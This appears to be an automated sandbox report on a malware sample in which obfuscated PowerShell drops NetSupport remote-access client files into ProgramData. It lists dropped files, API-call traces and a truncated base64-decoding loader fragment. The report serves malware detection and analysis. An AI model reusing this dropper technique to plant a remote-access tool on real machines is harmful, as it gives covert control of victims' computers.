                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
                                    Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
                                    Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
                                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

                                    Data Obfuscation

                                    barindex
                                    Found suspicious powershell code related to unpacking or dynamic code loading
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: PCICL32.DLL.26.drStatic PE information: section name: .hhshare
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF4636C push ds; ret 23_2_00007FF9BAF4636F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A46DC push ds; retf 23_2_00007FF9BB1A474F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A6FA5 pushad ; retf 23_2_00007FF9BB1A6FA6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB1A6EBD push eax; retf 23_2_00007FF9BB1A6EBE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB5447F5 push ebx; iretd 23_2_00007FF9BB5447FA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A282A pushad ; iretd 23_2_00007FF9BB6A2832
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6912D0 pushad ; ret 23_2_00007FF9BB6912E4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6962BC pushad ; ret 23_2_00007FF9BB6962B4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69629C pushad ; ret 23_2_00007FF9BB6962B4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6980FC push ebx; ret 23_2_00007FF9BB69813A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF68133 push ebx; ret 25_2_00007FF9BAF6813A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C4C8E push eax; iretd 25_2_00007FF9BB1C4C8F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C7BD4 push esi; ret 25_2_00007FF9BB1C7BD7
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C46DC push ds; retf 25_2_00007FF9BB1C474F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C4D76 pushad ; iretd 25_2_00007FF9BB1C4D77
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F33A1 push edi; retf 25_2_00007FF9BB3F33A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB575776 pushad ; retf 25_2_00007FF9BB5759DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB5758FF pushad ; retf 25_2_00007FF9BB5759DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB572CE0 push esp; retf 25_2_00007FF9BB572CE1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77225B push ds; retf 25_2_00007FF9BB77226D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77325B push cs; retf 25_2_00007FF9BB773272
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB770E78 push ds; retf 25_2_00007FF9BB770E79
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB770299 push ds; retf 25_2_00007FF9BB77029F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7725DF push es; retf 25_2_00007FF9BB7725EF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7721F7 push ds; retf 25_2_00007FF9BB7721F8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB7731FC push cs; retf 25_2_00007FF9BB7731FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771017 push ss; retf 25_2_00007FF9BB771018
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771625 push ss; retf 25_2_00007FF9BB771626
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB77082E push ds; retf 25_2_00007FF9BB770832
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB772037 push es; retf 25_2_00007FF9BB77203B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB771836 push cs; retf 25_2_00007FF9BB77183A
                                    Source: msvcr100.dll.26.drStatic PE information: section name: .text entropy: 6.909044922675825
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICHEK.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\msvcr100.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\AudioCapture.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\TCCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\remcmdstub.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\client32.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\pcicapi.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\HTCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICHEK.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\msvcr100.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\AudioCapture.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\TCCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\remcmdstub.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\client32.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\pcicapi.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\HTCTL32.DLLJump to dropped file
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,32_2_6BEC7030
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,32_2_11124DC0

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Tries to open files direct via NTFS file id
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_111365D0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,32_2_111365D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,32_2_11157150
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11157150 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,32_2_11157150
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11025180 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,32_2_11025180
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11157550 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,32_2_11157550
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110255D0 IsIconic,BringWindowToTop,GetCurrentThreadId,32_2_110255D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1110F720 IsIconic,GetTickCount,32_2_1110F720
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,32_2_1111F990
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1111F990 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,32_2_1111F990
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110238A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,32_2_110238A0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110BFC50 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,32_2_110BFC50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11023F80 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,32_2_11023F80
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11110340 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,32_2_11110340
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,32_2_110CA260
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CA260 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,32_2_110CA260
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
